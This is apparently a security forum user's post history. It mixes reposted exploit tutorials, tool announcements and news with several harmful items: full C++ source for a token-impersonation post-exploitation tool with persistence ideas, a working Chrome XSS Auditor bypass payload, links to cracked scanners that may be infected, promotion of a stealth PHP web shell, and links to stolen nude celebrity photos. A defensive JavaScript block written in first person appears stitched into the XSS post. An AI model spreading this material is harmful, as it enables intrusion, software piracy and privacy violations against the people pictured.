Everything posted by Nytro

  1. Packet Storm Security - Linux Exploit Writing

     Linux Exploit Writing Tutorial Part 1
     Quote: This whitepaper is the Linux Exploit Writing Tutorial Part 1 - Stack Overflows.

     Linux Exploit Writing Tutorial Part 2
     Quote: This whitepaper is the Linux Exploit Writing Tutorial Part 2 - Stack Overflow ASLR bypass using ret2reg instruction from vulnerable_1.

     Linux Exploit Writing Tutorial Part 3
     Quote: This whitepaper is the Linux Exploit Writing Tutorial Part 3 - ret2libc.

     Linux Exploit Development Part 2 Rev 2
     Linux Exploit Writing Tutorial Part 3 Rev 2

     Code:
     Linux Exploit Writing Tutorial Part 1 - Packet Storm
     Linux Exploit Writing Tutorial Part 2 - Packet Storm
     Linux Exploit Development Part 2 Rev 2 - Packet Storm
     Linux Exploit Writing Tutorial Part 3 - Packet Storm
     Linux Exploit Writing Tutorial Part 3 Revision 2 - Packet Storm

     Source: EXETOOLS FORUM
  2. We aren't Apple hipsters. Well, only @aelius is.
  3. It's good, man. SSL pinning = hardcoded RootCA/server certificate. That means it prevents Man in the Middle even with a RootCA installed locally (phone or computer).
  4. Ropper - rop gadget finder and binary information tool

     With ropper you can show information about files in different file formats and you can search for gadgets to build rop chains for different architectures. For disassembly ropper uses the awesome Capstone Framework. Ropper was inspired by ROPgadget, but should be more than a gadgets finder. So it is possible to show information about a binary like header, segments, sections etc. Furthermore it is possible to edit the binaries and edit the header fields. Until now you can set the aslr and nx flags.

     usage: ropper.py [-h] [-v] [--console] [-f <file>] [-i] [-e] [--imagebase]
                      [-c] [-s] [-S] [--imports] [--symbols] [--set <option>]
                      [--unset <option>] [-I <imagebase>] [-p] [-j <reg>]
                      [--depth <n bytes>] [--search <regex>] [--filter <regex>]
                      [--opcode <opcode>] [--type <type>]

     supported filetypes: ELF, PE
     supported architectures: x86, x86_64, MIPS

     optional arguments:
       -h, --help                show this help message and exit
       -v, --version             Print version
       --console                 Starts interactive commandline
       -f <file>, --file <file>  The file to load
       -i, --info                Shows file header [ELF/PE]
       -e                        Shows EntryPoint
       --imagebase               Shows ImageBase [ELF/PE]
       -c, --dllcharacteristics  Shows DllCharacteristics [PE]
       -s, --sections            Shows file sections [ELF/PE]
       -S, --segments            Shows file segments [ELF]
       --imports                 Shows imports [ELF/PE]
       --symbols                 Shows symbols [ELF]
       --set <option>            Sets options. Available options: aslr nx
       --unset <option>          Unsets options. Available options: aslr nx
       -I <imagebase>            Uses this imagebase for gadgets
       -p, --ppr                 Searches for 'pop reg; pop reg; ret' instructions [only x86/x86_64]
       -j <reg>, --jmp <reg>     Searches for 'jmp reg' instructions (-j reg[,reg...]) [only x86/x86_64]
       --depth <n bytes>         Specifies the depth of search (default: 10)
       --search <regex>          Searches for gadgets
       --filter <regex>          Filters gadgets
       --opcode <opcode>         Searches for opcodes
       --type <type>             Sets the type of gadgets [rop, jop, all] (default: all)

     example uses:
       [Generic]
       ropper.py
       ropper.py --file /bin/ls --console

       [Informations]
       ropper.py --file /bin/ls --info
       ropper.py --file /bin/ls --imports
       ropper.py --file /bin/ls --sections
       ropper.py --file /bin/ls --segments
       ropper.py --file /bin/ls --set nx
       ropper.py --file /bin/ls --unset nx

       [Gadgets]
       ropper.py --file /bin/ls --depth 5
       ropper.py --file /bin/ls --search "sub eax"
       ropper.py --file /bin/ls --filter "sub eax"
       ropper.py --file /bin/ls --opcode ffe4
       ropper.py --file /bin/ls --type jop
       ropper.py --file /bin/ls --ppr
       ropper.py --file /bin/ls --jmp esp,eax
       ropper.py --file /bin/ls --type jop

     Download: https://github.com/sashs/Ropper (v1.0.1, 01.09.2014)

     Source: Ropper - rop gadget finder and binary information tool
  5. The Chinese Underground In 2013
     2:04 am (UTC-7) | by Lion Gu (Senior Threat Researcher)

     The Chinese underground has continued to grow since we last looked at it. It is still highly profitable, the cost of connectivity and hardware continues to fall, and there are more and more users with poor security precautions in place. In short, it is a good time to be a cybercriminal in China. So long as there is money to be made, more people may be tempted to become online crooks themselves.

     How can we measure the growth of the Chinese underground economy? We can look at the volume of their communications traffic. Many Chinese cybercriminals talk via groups on the popular Chinese instant messaging application QQ. We have been keeping an eye on these groups since March 2012. By the end of 2013, we had obtained 1.4 million publicly available messages from these groups.

     The data we gathered helped us determine certain characteristics and developing trends in the Chinese underground economy. First, the number of messages showed that the amount of underground activity in China doubled in the last 10 months of 2013 compared with the same period in 2012. Based on the ID of the senders, we also believe that the number of participants has also doubled in the same period.

     Cybercriminals are also going where the users are. Many of the malicious goods being sold in the underground economy are targeted at mobile users, as opposed to PC users. A mobile underground economy is emerging in China (something we noted earlier this year), and this part of the underground economy appears to be more attractive and lucrative than other portions.

     Our latest paper in the Cybercrime Underground Economy Series titled The Chinese Underground In 2013 contains the details of these findings related to QQ, as well as other updates dealing with the Chinese underground.

     Source: The Chinese Underground In 2013 | Security Intelligence Blog | Trend Micro
  6. Latest Firefox version adds protection against rogue SSL certificates
     Firefox 32 has implemented a feature known as certificate key pinning
     By Jeremy Kirk | IDG News Service

     Mozilla has added a defense in its latest version of Firefox that would help prevent hackers from intercepting data intended for major online services.

     The feature, known as certificate key pinning, allows online services to specify which SSL/TLS (Secure Sockets Layer/Transport Layer Security) certificates are valid for their services. The certificates are used to verify a site is legitimate and to encrypt data traffic.

     The idea is to prevent attacks such as the one that affected Google in 2011, targeting Gmail users. A Dutch certificate authority (CA), Diginotar, was either tricked or hacked and issued a valid SSL certificate that would work for a Google domain. In theory, that allowed the hackers to set up a fake website that looked like Gmail and didn't trigger a browser warning of an invalid SSL certificate. Security experts have long warned that attacks targeting certificate authorities are a threat.

     Certificate pinning would have halted that kind of attack, as Firefox would have known Diginotar shouldn't have issued a certificate for Google.

     In Firefox 32, "if any certificate in the verified certificate chain corresponds to one of the known good (pinned) certificates, Firefox displays the lock icon as normal," wrote Sid Stamm, senior manager of security and privacy engineering at Mozilla, on a company blog. "When the root cert for a pinned site does not match one of the known good CAs, Firefox will reject the connection with a pinning error," he continued.

     The "pins" for the certificates of online services have to be encoded into Firefox. Firefox 32, released this week, supports Mozilla sites and Twitter. Later Firefox releases will support certificate pinning for Google sites, Tor, Dropbox and others, according to a project wiki.

     Source: Latest Firefox version adds protection against rogue SSL certificates | Applications - InfoWorld
  7. Milkman: Creating Processes as Any Currently Logged in User

     One of the problems with using PSEXEC from Metasploit (any of the psexec modules) is that it runs as SYSTEM. What's the problem with that? Isn't SYSTEM god mode? Ya, and normally I'd agree that it's the best level to have, but the defenses these days have gotten better, and getting direct connections out is pretty rare. That leaves proxies, and as you know SYSTEM doesn't get any proxy settings. Here is a blog post that I made about setting the proxies for SYSTEM but leaving settings like this set is not only sloppy but hard to clean up.

     Along comes RunAsCurrentUser-2.0.3.1.exe

     I found this gem by messing up a search on google for RunAsUser. Found it on this IBM support post.
     Link to direct download: http://software.bigfix.com/download/bes/util/RunAsCurrentUser-2.0.3.1.exe
     Here is a mirror uploaded to my Post Exploitation repo: https://github.com/mubix/post-exploitation/blob/master/win32bins/RunAsCurrentUser-2.0.3.1.exe

     This binary takes a path to another executable as an argument. It then finds the currently logged in user and starts the provided executable as that user. AWESOME! This basically solves the whole PSEXEC->SYSTEM no-proxy settings issue. And it's created by a legitimate company for legitimate reasons? w00tw00t. Game on!

     Only two problems:
     - It is 335K, which doesn't seem like much but over high latency lines that can take an eternity to transfer, especially over doubly encrypted channels like with a reverse_https meterpreter session.
     - It takes an argument which normally isn't a huge challenge, but in our specific use case, psexec modules in Metasploit, it isn't something we can do easily. You would have to upload your C2 binary, as well as the 335K RunAsCurrentUser over to the target host, then run the psexec_command module to execute them both, one as the argument of the other. Kinda sloppy.

     So I set to try and figure out how this binary did its magic. As I'm not much of a reverse engineer I uploaded it to VirusTotal so I could take a look at its insides (plus, double check to see if it was being detected as malicious at all). As far as I can tell the important pieces are the Windows API calls ImpersonateLoggedOnUser, and CreateProcessAsUserA.

     I set to trying to reproduce what it did in AutoIT (awesome stuff if you have never checked it out). I couldn't quite get the API calls right, so I decided to give C++ a shot. Turned out to be pretty simple.

     I present to you "Milkman": https://gist.github.com/mubix/5d0cacdabfe092922fa3 (full source included below)

     This program (once compiled) takes one argument (or none at all) and runs calc.exe for every instance of the process you tell it to. If you run it without arguments it auto selects explorer.exe. So if you create a service:

         C:\temp\>sc create SuperService binpath= C:\Temp\milkman.exe type= own start= auto
         [SC] CreateService SUCCESS

     It will start up every time the computer starts, which is completely useless, since there won't be any users logged in at that point, but you get where this can go.

     Features to add to this at point are:
     - Create a service binary that responds to START/STOP/PAUSE commands and such so that running this as a persistence method would actually be useful.
     - Add a loop so that it continues to run checking for explorer.exe every so often so it can catch when someone is logged in.
     - Finally the obvious one is to change it from being calc.exe that it runs by accepting another argument or some other kind of config option.

     Thoughts? What would you like Milkman to do, or what use case do you think a tweak would make it work better for? Leave a comment below.
         #ifndef UNICODE
         #define UNICODE
         #endif
         #include <Windows.h>
         #include <string.h>
         #include <stdio.h>
         #include <Psapi.h>

         // Print a readable message for a Win32 error code
         void perror(DWORD nStatus)
         {
             LPVOID lpMsgBuf;
             FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,
                           NULL, nStatus, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPTSTR)&lpMsgBuf, 0, NULL);
             wprintf(L"[-] %6d %s\n", nStatus, lpMsgBuf);
             if (lpMsgBuf) {
                 LocalFree(lpMsgBuf);
             }
         }

         // Returns 1 if str ends with suffix (used to match the image path against a process name)
         int str_ends_with(TCHAR *str, TCHAR *suffix)
         {
             if (str == NULL || suffix == NULL) {
                 return 0;
             }
             size_t str_len = wcslen(str);
             size_t suffix_len = wcslen(suffix);
             if (suffix_len > str_len) {
                 return 0;
             }
             return 0 == wcscmp(str + str_len - suffix_len, suffix);
         }

         // Duplicate the token of process PID and start calc.exe under it
         int start_process(int PID)
         {
             TCHAR cmd[512] = TEXT("calc.exe");
             STARTUPINFO startup_info;
             PROCESS_INFORMATION process_information;
             SECURITY_IMPERSONATION_LEVEL impLevel = SecurityImpersonation;
             LPVOID pEnvironment;
             HANDLE hProc = NULL;
             HANDLE hToken = NULL;
             HANDLE hTokenDup = NULL;

             ZeroMemory(&startup_info, sizeof(startup_info));
             startup_info.cb = sizeof(startup_info);
             ZeroMemory(&process_information, sizeof(process_information));
             ZeroMemory(&pEnvironment, sizeof(pEnvironment));

             hProc = OpenProcess(GENERIC_ALL, FALSE, PID);
             //perror(GetLastError());
             OpenProcessToken(hProc, GENERIC_ALL, &hToken);
             //perror(GetLastError());
             ImpersonateLoggedOnUser(hToken);
             //perror(GetLastError());
             DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, NULL, impLevel, TokenPrimary, &hTokenDup);
             //perror(GetLastError());
             CreateProcessAsUser(hTokenDup, NULL, cmd, NULL, NULL, FALSE, CREATE_NO_WINDOW,
                                 &pEnvironment, NULL, &startup_info, &process_information);
             //perror(GetLastError());
             return 0;
         }

         // Enumerate all processes and call start_process() for each one whose image name ends with `name`
         int find(TCHAR *name)
         {
             //wprintf(TEXT("Looking for %s\n"), name);
             DWORD aProcesses[1024], cbNeeded, cProcesses;
             unsigned int i;
             HANDLE hProcessEnum;
             TCHAR szProcessName[MAX_PATH] = TEXT("<unknown>");

             if (!EnumProcesses(aProcesses, sizeof(aProcesses), &cbNeeded)) {
                 return 1;
             }
             cProcesses = cbNeeded / sizeof(DWORD);

             for (i = 0; i < cProcesses; i++) {
                 if (aProcesses[i] != 0) {
                     hProcessEnum = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, aProcesses[i]);
                     if (NULL != hProcessEnum) {
                         GetProcessImageFileName(hProcessEnum, szProcessName, sizeof(szProcessName) / sizeof(TCHAR));
                         if (str_ends_with(szProcessName, name)) {
                             //wprintf(TEXT("[+] %d -\t%s\n"), aProcesses[i], szProcessName);
                             start_process(aProcesses[i]);
                         }
                     }
                 }
             }
             return 0;
         }

         int wmain(int argc, TCHAR *argv[])
         {
             if (argc > 1 && argv[1]) {
                 find(argv[1]);
                 //perror(GetLastError());
             } else {
                 find(TEXT("explorer.exe"));
                 //perror(GetLastError());
             }
             return 0;
         }

     Posted by mubix Aug 14th, 2014

     Source: Milkman: Creating processes as any currently logged in user - Room362.com
  8. Google Chrome 31.0 XSS Auditor Bypass
     Authored by Rafay Baloch

     Google chrome XSS auditor was found prone to a bypass when the user input passed though location.hash was being written to the DOM by using document.write property. Normally, XSS auditor checks XSS by comparing the request and response however, it also checks for request itself, if it contains an untrusted input to prevent DOM XSS as well.

     #Vulnerability: Google Chrome 31.0 XSS Auditor Bypass
     #Impact: Moderate
     #Authors: Rafay Baloch
     #Company: RHAInfoSec
     #Website: http://rhainfosec.com <http://rhainfose.com/>
     #version: Latest

     Description

     Google chrome XSS auditor was found prone to a bypass when the user input passed though location.hash was being written to the DOM by using document.write property. Normally, XSS auditor checks XSS by comparing the request and response however, it also checks for request itself, if it contains an untrusted input to prevent DOM XSS as well.

     Proof Of concept:

     Consider the following code:

         <html>
         <body>
         <script type="text/javascript">
         document.write(location.hash);
         </script>
         </body>
         </html>

     This takes input from location.hash property and writes it to the DOM. We initially inject the following payload: #<img src=x onerror=prompt(1)>. The request is blocked and the following error is returned:

     "The XSS Auditor refused to execute a script in 'attacker.com#><img src=x onerror=prompt(1)>' because its source code was found within the request. The auditor was enabled as the server sent neither an 'X-XSS-Protection' nor 'Content-Security-Policy' header."

     However, the following vector passes by: #<img src=x onerror=prompt(1)//

     The following is how its reflected inside of DOM:

         <img src="x" onerror="prompt(1)//" <="" body="">

     Source: Google Chrome 31.0 XSS Auditor Bypass - Packet Storm
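The fix on the application side is to stop treating location.hash as markup. The following is an added example, not part of the advisory or of Chrome: it decodes the fragment first (so a percent-encoded bracket cannot slip past a check that runs before decoding) and then HTML-escapes it, and checks that neither vector quoted above can still open a tag. The function names and the constructed inputs are mine.

```javascript
// Added example: hardening the document.write(location.hash) page from the
// advisory. The unsafe and safe renderers are kept side by side so the
// difference can be checked offline, without a browser.

// Minimal HTML escape for text and attribute contexts.
const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ESCAPES[c]);
}

// Fragments may arrive percent-encoded. Decode BEFORE escaping, never after:
// escaping first and decoding later would re-introduce a raw '<'.
// Malformed sequences throw URIError; keep the raw string in that case.
function safeDecode(fragment) {
  try {
    return decodeURIComponent(fragment);
  } catch (e) {
    return fragment;
  }
}

// What the advisory's page effectively does: document.write(location.hash).
function renderUnsafe(hash) {
  return safeDecode(hash);
}

// Hardened version: the fragment only ever becomes text, never markup.
// In a real page the equivalent is `el.textContent = safeDecode(location.hash)`.
function renderSafe(hash) {
  return escapeHtml(safeDecode(hash));
}

// An element (and therefore an onerror handler) can only be created if an
// unescaped '<' is followed by a tag-start character.
function containsTag(html) {
  return /<[a-z/!?]/i.test(html);
}

// Constructed inputs: the two vectors from the advisory, plus a
// percent-encoded variant of the second one.
const VECTORS = [
  '#<img src=x onerror=prompt(1)>',
  '#<img src=x onerror=prompt(1)//',
  '#%3Cimg%20src%3Dx%20onerror%3Dprompt(1)//',
];

// Returns, per vector, whether each renderer lets a tag through.
function demo() {
  return VECTORS.map((v) => ({
    vector: v,
    unsafeOpensTag: containsTag(renderUnsafe(v)),
    safeOpensTag: containsTag(renderSafe(v)),
  }));
}
```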
  9. Bifrozt - A high interaction honeypot solution for Linux based systems.
     Tue, 09/02/2014 - 12:34 — are.hansen

     A few days ago I was contacted by our CPRO, Leon van der Eijk, and asked to write a blog post about my own project called Bifrozt; something which I was more than happy to do. This post will explain what Bifrozt is, how this got started, the overall status of the project and what will happen further down the road.

     What is Bifrozt?

     Generally speaking, Bifrozt is a NAT device with a DHCP server that is usually deployed with one NIC connected directly to the Internet and one NIC connected to the internal network. What differentiates Bifrozt from other standard NAT devices is its ability to work as a transparent SSHv2 proxy between an attacker and your honeypot. If you deployed a SSH server on Bifrozt's internal network it would log all the interaction to a TTY file in plain text that could be viewed later and capture a copy of any files that were downloaded. You would not have to install any additional software, compile any kernel modules or use a specific version or type of operating system on the internal SSH server for this to work. It will limit outbound traffic to a set number of ports and will start to drop outbound packets on these ports when certain limits are exceeded.

     How it started.

     Bifrozt is not something I can take full credit for, it depends on an awesome python project by Thomas Nicholson which I discovered in February 2014. Thomas had coded a SSH proxy called HonSSH and had taken inspiration and utilized code from the medium interaction Kippo honeypot. After I discovered HonSSH I decided to build an ISO file, that would allow me to install a pre-configured NAT device with HonSSH, on either a hardware or virtualized machine. I thought this would be a suitable project that I could occupy myself with during a 2 week holiday. Six months later and the project is still very much alive.

     Current status.

     Thomas and I have been co-operating over the last five months to align our projects as much as possible. Developing Bifrozt is much like building a car. Thomas is developing the engine (HonSSH) and making sure it's running smoothly, whilst I am developing the strong and solid frame (firewall, data extraction from log files, data control, system configuration etc etc) around it. Bifrozt has been in a proof of concept stage (Alpha) for the last six months. The current version, 0.0.8, has a relatively humble feature list, but this is about to change.

     Bifrozt 0.0.8
     --------------
     - Intercept downloaded files
     - Logs all SSH communications to plain text file and TTY logs
     - Enforces data control
     - Facilitates data capture
     - Provides high level integrity of the captured data
     - Hardware installation
     - Virtual installation
     - Honeyd is pre-installed
     - Easy data extraction from logs
     - Disrupts outbound SYN flood attacks from the honeypot
     - Disrupts outbound UDP flood attacks from the honeypot
     - Compatible with amd64 architecture

     After a few weeks of summer vacation I've started planning and testing the next release of Bifrozt.

     Bifrozt 0.0.9
     --------------
     - Compatible with x86 architecture
     - IDS (Snort or Suricata)
     - Viewing alerts and statistics through a browser
     - Complete overhaul of the Python code
     - Multiple installation options to better suit the hardware resources and needs of the end user
     - Expand the current toolbox
     - Change base system from Ubuntu to Debian (not made any final decision about this yet)
     - Tool to generate DROP rules based on country of origin
     - Update and add more functions to bifrozt_stats (log data extraction)

     Roadmap for the future.

     No one knows what is going to happen down the road but, at the present time neither Thomas nor I plan on abandoning our projects any time soon. We have both decided to create a road map for the future and he has allowed me to share them here, together with mine.

     Bifrozt roadmap.
     -------------------
     Short term goals (Alpha stage):
     System:
     - Off line installation
     - Desktop environment (install option)
     - Optimizing IDS
     - Expand/improve web stats (optimize current, add HonSSH, create a dedicated start page)
     - HP feeds data sharing
     - Optimize firewall and data control
     Tools:
     - Simple static malware analysis (add VirusTotal upload function)
     - System re-configuration tool(s) (DHCP, SSH, firewall etc etc)
     - Develop new tools or adjust current to complement additional data captured by HonSSH

     Long term goals (Beta stage and beyond):
     - Provide a NAT device that provides reliant data capture of the most commonly used protocols
     - Quickly display data about the attacks, malware, outbound communication in an easy understandable format
     - To the extent of my abilities, make sure the project continues to be based on open source and freely available to anyone.

     HonSSH roadmap.
     ---------------------
     Short term:
     - Bring HonSSH out of proof-of-concept code into a more logical production format
     - Implement a bot to owner correlation technique using random passwords
     - Bug bashing

     Longer term:
     - Output data to ElasticSearch
     - Allow HTTP tunneling (currently disabled), parse HTTP outputs etc.
     - Parse X11 sessions - not sure if this will be worth it or not.
     - More consideration on data analysis (might be a separate project)

     HonSSH's current aim:
     - Parse, interpret and log all communications that travel through an SSH tunnel. Currently supports Terminal, Exec (and SCP) and SFTP traffic.

     HonSSH's current challenges:
     - Parsing the terminal - knowing what is a command, and what is program input e.g. nano etc.

     HonSSH's current questions:
     - Should HonSSH act on commands? e.g. When a wget command is detected, should it pull down the file (active), or should we use/develop another tool for passive packet capture/MITM of HTTP and IRC

     LINKS: Bifrozt, HonSSH

     Source: https://www.honeynet.org/node/1191
  10. http://bunga-videos.com/xxx/epic-celebrity-nude-leak-jennifer-lawrence-kate-upton-more/
  11. RiskTool.Patcher
      HackTool[CrackTool:not-a-virus]/Win32.Patcher
      Win32:Patcher-AK [PUP]
      Riskware/GamePatcher
      PUA.HackTool.Patcher

      Most of them say it's a "Patcher". It's somewhat normal for it to be detected, it's a keygen.
  12. Here is netsparker 3.5.3

      I haven't tried it, I don't know if it's infected, run it at your own risk.

      Download: Download Crack rar

      I highly recommend that you use the cracks/patch after testing and download the apps trial versions from official websites and then use cracks on those.

      Source: https://www.opensc.ws/off-topic/19840-ibm-appscan-9-hp-webinspect-10-20-acunetix-9-5-a.html#post177138
  13. Webinspect 10.20: download the application from official site itself.

      I haven't tried it, I don't know if it's infected, run it at your own risk.

      Download: https://download.hpsmartupdate.com/webinspect/
      and crack here:
      Crack: hp webinspect crack.rar — RGhost — file sharing

      to crack copy WI8.exe and HPLicense.xml in installation folder
      double click WI8.exe
      first click on license and browse HPLicense.xml
      Then click on patch.
      Enjoy will be valid till 2020.

      Source: https://www.opensc.ws/off-topic/19840-ibm-appscan-9-hp-webinspect-10-20-acunetix-9-5-a.html#post177138
  14. You can download trial version of appscan from their site by registering and downloading evaluation version. Otherwise you can download from here

      I haven't tried it, I don't know if it's infected, run it at your own risk.

      Download: ??? ??-qinxiaopeng456???

      Download APPS_STD_EDI_9.0_WIN_ML_EVA .exe and LicenseProvider.dll
      Install appscan and then replace the LicenseProvider.dll in installation directory.

      Source: https://www.opensc.ws/off-topic/19840-ibm-appscan-9-hp-webinspect-10-20-acunetix-9-5-a.html#post177138
  15. Audit Your Website Security with Acunetix Web Vulnerability Scanner

      As many as 70% of web sites have vulnerabilities that could lead to the theft of sensitive corporate data such as credit card information and customer lists. Hackers are concentrating their efforts on web-based applications - shopping carts, forms, login pages, dynamic content, etc. Accessible 24/7 from anywhere in the world, insecure web applications provide easy access to backend corporate databases.

      I haven't tried it, I don't know if it's infected, run it at your own risk:

      Download (cracked): Download Web Vul Scanner tar

      Source: https://www.opensc.ws/off-topic/19840-ibm-appscan-9-hp-webinspect-10-20-acunetix-9-5-a.html#post177138
  16. Kids these days... Install AdBlock Plus.
  17. Shit on bread:
      - they don't have a site (Wiki-shit)
      - the presentation video is aimed at anonymous-wannabe chavs
      - the "graphics" I would have liked... when I was 12

      You can't compare Kali, a stable operating system maintained by a team of professionals, with this piece of junk.

      Edit: I'm looking over their "install-cloud-pizda-pe-paine" script:

          echo "deb http://frozenbox.mirror.garr.it/mirrors/parrot stable main" > /etc/apt/sources.list.d/parrot.list
          echo "deb http://frozenbox.mirror.garr.it/mirrors/debian stable main contrib non-free\ndeb-src http://frozenbox.mirror.garr.it/mirrors/debian stable main contrib non-free\n\ndeb http://frozenbox.mirror.garr.it/mirrors/debian stable-updates main contrib non-free\ndeb-src http://frozenbox.mirror.garr.it/mirrors/debian stable-updates main contrib non-free" > /etc/apt/sources.list.d/debian.list
          echo "deb http://frozenbox.mirror.garr.it/mirrors/kali kali-only main contrib non-free\ndeb http://frozenbox.mirror.garr.it/mirrors/kali-security kali/updates main contrib non-free" > /etc/apt/sources.list.d/kali.list
          echo "deb http://repo.mate-desktop.org/debian wheezy main" > /etc/apt/sources.list.d/mate.list
          wget -qO - http://repository.frozenbox.org/parrot/frozenbox.gpg.key | apt-key add -
          wget -qO - http://repository.frozenbox.org/parrot/kali.gpg.key | apt-key add -
          wget -qO - http://repo.mate-desktop.org/debian/mate-archive-keyring.gpg | apt-key add -
          apt-get update
          apt-get -y install apt-parrot --no-install-recommends
          apt-get update
          apt-get -y install parrot-core parrot-cloud parrot-tools-cloud
          apt-get dist-upgrade

      More precisely:

          echo "deb http://frozenbox.mirror.garr.it/mirrors/kali kali-only main contrib non-free\ndeb http://frozenbox.mirror.garr.it/mirrors/kali-security kali/updates main contrib non-free" > /etc/apt/sources.list.d/kali.list
          wget -qO - http://repository.frozenbox.org/parrot/kali.gpg.key | apt-key add -

      It was obvious: it's just a repainted Kali, for the fuck of it.
  18. C/C++ and Buffer Overflow Topics

      Buffer overflow, one of the most widely used exploits in the last decades, has affected the internet domain at large, for example through virii and worms. What is the real cause actually? In this tutorial we will investigate some of the fundamental reasons that can be found in C/C++ programs, applications and processors that can generate the buffer overflow problem. Though most of the C/C++ functions/libraries already implemented new constructs, the secure constructs, the effect still can be seen till today. You will see that programmers also must be competent and have the responsibility in building programs or applications that are secure.

      - Introduction - Intro to how and why buffer overflow happens and is exploited.
      - Basic of x86 Architecture - The basics of Intel processor internal architecture that relate to buffer overflow topics, registers and basic instruction set operations.
      - Assembly Language - Introduction to the assembly language, needed to program buffer overflow codes during the Shellcode building, payload crafting and shrinking the size of the C programs.
      - Compiler, Assembler & Linker - The process of compiling, assembling and linking C/C++ codes, the step-by-step operations.
      - C Function Operation - The details of the C/C++ function operation, stack call setup and destruction.
      - C Stack Setup - The C/C++ stack story, exposes the exploited buffer in registers.
      - Stack Operation - The C/C++ stack operation that exposes the exploited buffer.
      - Stack-based Buffer Overflow - How the processor's buffer can be overflown by malicious codes.
      - Shellcode: The Payload - Understanding and creating the shellcodes for the buffer overflow payloads, creating the malicious codes.
      - Vulnerability & Exploit Examples - Testing the real C codes in the real and controlled environment to show the buffer overflow in action. Escalating the local Linux Fedora Core root privilege.
      - C, C++ and Bufferoverflow Books

      See more at: The buffer overflow hands-on tutorial using C programming language on Linux/Unix platforms and Intel microprocessor architecture with C code samples and tons of illustrations
  19. Nude photos of Jennifer Lawrence and others posted online by alleged hacker
      Website user publishes list of 100 mostly female actors, singers and celebrities of whom they claim to have explicit images
      Paul Farrell

      Pictures of Hunger Games star Jennifer Lawrence have been circulating on the internet. Photograph: Rotello/Photofab/REX/Rotello/Photofab/REX

      Images of more than 100 well-known actors, singers and celebrities, including what appear to be nude photos and videos, may have been exposed by a hacker in a major breach of privacy.

      On Sunday a user on the 4chan website posted a list of mostly female actors and public figures, including Jennifer Lawrence, Avril Lavigne, Kim Kardashian, Rihanna, Kirsten Dunst, Aubrey Plaza and Winona Ryder, of whom they claim to have explicit photographs or videos. A number of photos from some celebrities, including Hunger Games star Lawrence, have since been circulating on file-sharing and photo sites.

      4chan quickly removed the posts from their site but screenshots of the list by one of the posters has a list of more than 60 names of celebrities who are alleged to have been hacked.

      The release of the images has drawn varying responses from the celebrities, with some conceding they are real photos and others denying their veracity. Buzzfeed reported that the user had also posted images of his desktop, one of which appeared to be an image of Jennifer Lawrence.

      A spokesman for Lawrence said: "This is a flagrant violation of privacy. The authorities have been contacted and will prosecute anyone who posts the stolen photos of Jennifer Lawrence."

      Blah blah. The porn pictures are here: http://www.reddit.com/r/TheFappening/comments/2f44n0/new_celeb_leaked_pics_all_in_one_place/

      Jennifer Lawrence: http://imgur.com/a/KWOV2#0

      Source: Nude photos of Jennifer Lawrence and others posted online by alleged hacker | World news | theguardian.com
  20. Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, Various Linuxes, FreeBSD 6.2). It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases). It is written as a single shell script so it can be easily uploaded and run (as opposed to un-tarred, compiled and installed). It can run either as a normal user or as root (obviously it does a better job when running as root because it can read more files). Also see: unix-privesc-check | pentestmonkey Download: https://code.google.com/p/unix-privesc-check/
  21. Weevely

      Weevely is a stealth PHP web shell that provides a telnet-like console. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones. Weevely is currently included in Backtrack and Backbox and all the major Linux distributions oriented for penetration testing. Start with a quick Tutorial, read about Modules and Generators.

      - More than 30 modules to automate administration and post exploitation tasks
      - Backdoor communications are hidden in HTTP Cookies
      - Communications are obfuscated to bypass NIDS signature detection
      - Backdoor polymorphic PHP code is obfuscated to avoid HIDS AV detection

      Download: https://epinna.github.io/Weevely/
  22. Whonix is an operating system focused on anonymity, privacy and security. It's based on the Tor anonymity network[1], Debian GNU/Linux[2] and security by isolation. DNS leaks are impossible, and not even malware with root privileges can find out the user's real IP.

      Whonix consists of two parts: One solely runs Tor and acts as a gateway, which we call Whonix-Gateway. The other, which we call Whonix-Workstation, is on a completely isolated network. Only connections through Tor are possible.

      To learn more about security and anonymity under Whonix, please continue to the About Whonix page.

      Info: https://www.whonix.org/
  23. Have fun: Leaks - Imgur. Jennifer Lawrence and other celebrities "naked" :->